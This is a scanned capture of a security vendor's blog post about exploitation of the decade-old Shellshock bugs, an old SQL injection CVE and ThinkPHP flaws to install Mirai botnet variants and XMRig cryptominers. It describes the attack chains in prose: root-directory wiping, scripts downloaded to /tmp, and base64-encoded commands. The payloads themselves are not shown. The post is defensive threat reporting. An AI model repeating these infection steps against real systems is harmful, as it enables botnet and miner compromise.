blog.barracuda.com Open in urlscan Pro
4.234.25.19  Public Scan

Form analysis
1 forms found in the DOM

GET https://blog.barracuda.com/search

<form method="GET" class="cmp-search-box__form" action="https://blog.barracuda.com/search">
  <input class="cmp-search-box__form__input" type="search" name="searchTerm" aria-label="Search for" placeholder="Search" value="" data-cmp-hook-header="searchInput">
  <a href="#" class="cmp-search-box__form__search-btn" aria-label="Search" data-cmp-hook-header="searchSubmit">
        <span class="cmp-search-box__form__search-btn__icon"></span>
    </a>
</form>

Text Content

 * Home
 * Ransomware Protection
 * AI and Security
 * Research

 * Home
 * Ransomware Protection
 * AI and Security
 * Research

TYPE AND PRESS ENTER TO SEARCH


THREAT SPOTLIGHT: WEB APPS UNDER ACTIVE THREAT FROM 10-YEAR-OLD SHELLSHOCK BUGS
AND MINERS

Topics:
Mar. 6, 2024
|
Tushar Richabadas
Tweet
Share
Share
Tweet
Share
Share

The Shellshock bugs — there are six related CVE designations — have the highest
severity rating of 10. They exist in the Unix Bash shell, which is the default
command-line interface on all Linux, Unix, and Mac-based operating systems. If
successfully exploited, Shellshock could enable an attacker to cause Bash to
execute arbitrary commands and gain unauthorized access to many internet-facing
services, such as web servers, that use Bash to process requests.


VULNERABLE SOFTWARE UNDER ACTIVE ATTACK

The top three vulnerabilities currently being targeted with Shellshock attacks
are in the chart below. They highlight how vulnerabilities can lurk for years
undetected in the software supply chain.

A device could be running the latest version of firmware, yet still be
vulnerable, because the people creating that software did not update the
libraries in their supply chain.



CVE-2019-7481 is a 7.5 rated SQL injection vulnerability in a security service
for which a patch exists. CVE-2021-42071 is a critical 9.8 rated vulnerability
in a visual tool application that could allow an unauthenticated attacker to
achieve remote command execution.


INSTALLING MIRAI BOTNET VARIANTS

CVE-2019-7481 has been targeted since at least 2021 by attackers trying to
install Mirai botnet variants. The Mirai botnet comprises a vast number of
hacked connected (IoT) devices and is used predominantly to launch DDoS attacks.

Since Mirai first came to the forefront in August 2016, researchers have seen
multiple variants appear on the threat landscape. Mirai primarily targets IoT
Linux-based devices. Most of the attacks start by downloading a shell script
that then downloads several platform-specific malware binaries and attempts to
run them. Once infected, the device becomes part of the growing botnet.

The first two Mirai variants that we saw in our logs were going after the LuCI
web interface for OpenWRT-based routers. This is a management interface that
should not be exposed to the internet. Unfortunately, it often is, and attackers
use this to their advantage.

The first variant was used by attackers trying to execute a shell script named
“sorry.sh”.

This script is no longer available. According to URLhaus, it has been reported
and taken down. However, the analysis on URLhaus makes it clear that this is
part of a Mirai/Gafgyt infestation attempt. A more detailed description is
available on VirusTotal.



The second variant is still active.

The attackers using this variant delete everything in the root directory and
then download a shell script in /tmp.



The shell script when executed downloads several platform-specific binaries and
then executes them in order.

The developer of this specific script appears to have a sense of humor. The
downloaded files are renamed using an escalating series of insults (duly
censored in the screenshot.)


A different Mirai/Gafgyt variant was targeting a remote command execution
vulnerability in Zyxel routers. The URLhaus entry shows that this was also a
Mirai “infector” (huhu.mips) — though it is now offline. Looking at the entry
for the IP address, it is currently serving the malware with a new name
(skyljne.mips.)



CRYPTOMINER INFECTIONS TARGETING VULNERABILITIES

In addition to Shellshock, we have seen attackers targeting vulnerabilities to
install cryptominers.

Back in 2022, we saw cryptominers attempting to exploit the then new Atlassian
Confluence vulnerability. In February 2024, we are seeing active attempts to
exploit years old ThinkPHP vulnerabilities and install XMRig miners.

The first URL we saw was:


Decoding the partial base64, we find the following command:

This shows up on ANY.RUN as the XMRig miner. At the time of writing this blog,
the miner is still online.

Another example of this is:

This decodes to:


An analysis of this shell script on ANY.RUN shows that it downloads the redtail
binary as well.

A third example of this is the same 45.x IP serving a different script:


This decodes to:


Per VirusTotal, this is likely a miner too.

A final example of the miner is this one:


This decodes to:


The name of the miner in this case is not obfuscated and is directly
identifiable as XMRig. It is currently offline.

All the miner examples are targeting older ThinkPHP vulnerabilities — remote
code execution (RCE) vulnerabilities from 2018 and 2020 that should rightfully
be patched by now.


KEEPING YOUR APPLICATIONS SECURE

These types of attacks come and go in waves, with each wave — both for Mirai and
for cryptominers —targeting specific vulnerabilities in campaigns.

Around 10 years ago, attackers mainly looked for and used newer vulnerabilities
such as zero days to try to get into the network. This has shifted to attackers
working smarter, not harder. They’ve caught onto the fact that software supply
chains are rarely fully secure, and they are using older but still unpatched
vulnerabilities to their advantage.

The software supply chain security issue is quite difficult to solve — you could
deploy the latest version of your file transfer software, but under the hood
that software might be using a vulnerable version of Log4J. You assume your
application is secure, but in fact it has a known vulnerability. And the only
way to find this out is if you are running regular vulnerability scans. In the
case of Log4J, you are likely doing this. But what happens if the vulnerability
is in a relatively unknown library that is only used in this one software?

The old defense-in-depth advice remains relevant. Having a defensive “onion” for
your network and applications is crucial to preventing attacks before they can
reach your application. This approach will also give you time and aircover for
when you have not yet been able to patch a new zero day.

Protection against DDoS also remains critical. Attackers are using years old
vulnerabilities to create their botnets and perform newer types of DDoS attacks
such as HTTP/2 Rapid Reset. Having a solution in place that can stop older
volumetric DDoS attacks, and newer, subtler application DDoS attacks is critical
for business continuity.

If you look at the vulnerabilities mentioned above and in our recent application
security Threat Spotlight, you see that when it comes to applications, the
software supply chain is a weak link that needs and deserves a significant
protective layer.

Scan your web applications for vulnerabilities
Tushar Richabadas

Tushar Richabadas is Senior Product Marketing Manager, Applications and Cloud
Security, Barracuda.  Prior to this role, Tushar was a Product Manager for the
Barracuda Web Application Firewall and Barracuda Load Balancer ADC, with a focus
on cloud and automation.  Tushar has a wide range of experience, from leading
networking product testing teams and technical marketing for HCL-Cisco. Tushar
closely tracks the rapidly increasing impact of digital security and is
passionate about simplifying digital security for everyone.

Connect with him on LinkedIn here.

Related Posts:
Dell: 49 million customer records exposed in 1 automated attack
Barracuda wins 5 Global InfoSec Awards
Threat Spotlight: The remote desktop tools most targeted by attackers in the
last year
AI promises to improve application security
Tweet
Share
Share
Tweet
Share
Share

--------------------------------------------------------------------------------


Popular Posts

Who is behind Cactus ransomware? LockBit to FBI: 'You can't stop me' How
attackers weaponize generative AI through data poisoning and manipulation
ALPHV-BlackCat ransomware group goes dark 5 Ways cybercriminals are using AI:
Malware generation

Topics

13 Email Threat Types Ransomware Protection Microsoft 365 Email Protection
Network Protection Application and Cloud Protection Data Protection and Recovery
Healthcare Education Industrial and IoT Security Managed Services Digital
Transformation Barracuda Engineering

Resources

Free Email Threat Scan Cyber Liability Insurance Guide Careers at Barracuda
Barracuda Engineering Barracuda News Room

2024 © Journey Notes
 * Email Protection
 * Application Protection
 * Network Protection
 * Data Protection
 * Managed XDR




COOKIE ACCEPTANCE

We use cookies to make our website work. We and our partners would also like to
set optional cookies for analytics purposes, as well as to measure and improve
the performance of the website, and to remember your preferences and provide you
enhanced functionality and personalization. Click on the Cookies Preferences
button to find out more and set your preferences.

Click on the Accept All button if you consent to the use of all such cookies. If
you choose to allow the use of such cookies, you will be able to withdraw your
consent at any time. Please refer to our Privacy Policy to better understand
your rights.Privacy Policy
Accept All Cookies
Cookie Preferences



HOW BARRACUDA USES COOKIES




YOUR PRIVACY

YOUR PRIVACY

Barracuda Sites may request cookies to be set on your device. We use cookies to
let us know when you visit our Barracuda Sites, to understand how you interact
with us, to enrich and personalize your user experience, to enable social media
functionality and to customize your relationship with Barracuda, including
providing you with more relevant advertising. Note that blocking some types of
cookies may impact your experience on our Barracuda Sites and the services we
are able to offer.


 * STRICTLY NECESSARY COOKIES
   
   STRICTLY NECESSARY COOKIES
   
   Always Active
   Strictly Necessary Cookies
   
   These cookies are necessary for the website to function and cannot be
   switched off in our systems. They are usually only set in response to actions
   made by you which amount to a request for services, such as setting your
   privacy preferences, logging in or filling in forms. You can set your browser
   to block or alert you about these cookies, but some parts of the site will
   not then work.


 * ANALYTICS COOKIES
   
   ANALYTICS COOKIES
   
   Analytics Cookies
   
   These cookies help Barracuda to understand how visitors to our pages engage
   within their session. Analytics Cookies assist in generating reporting site
   usage statistics which do not personally identify individual users.


 * PERFORMANCE COOKIES
   
   PERFORMANCE COOKIES
   
   Performance Cookies
   
   These cookies allow us to count visits and traffic sources so we can measure
   and improve the performance of our site. They help us to know which pages are
   the most and least popular and see how visitors move around the site. If you
   do not allow these cookies we will not know when you have visited our site,
   and will not be able to monitor its performance.


 * TARGETING COOKIES
   
   TARGETING COOKIES
   
   Targeting Cookies
   
   These cookies may be set through our site by our advertising partners. They
   may be used by those companies to build a profile of your interests and show
   you relevant adverts on other sites. They do not directly identify you, but
   are based on uniquely identifying your browser and internet device. If you do
   not allow these cookies, you will experience less targeted advertising.


 * FUNCTIONAL COOKIES
   
   FUNCTIONAL COOKIES
   
   Functional Cookies
   
   These cookies enable the website to provide enhanced functionality and
   personalisation. They may be set by us or by third party providers whose
   services we have added to our pages. If you do not allow these cookies then
   some or all of these services may not function properly.

Back Button


ADVERTISING COOKIES

Filter Button
Consent Leg.Interest
Select All Vendors
Select All Vendors
Select All Hosts

Select All



Clear Filters

Information storage and access
Apply
Confirm My Choices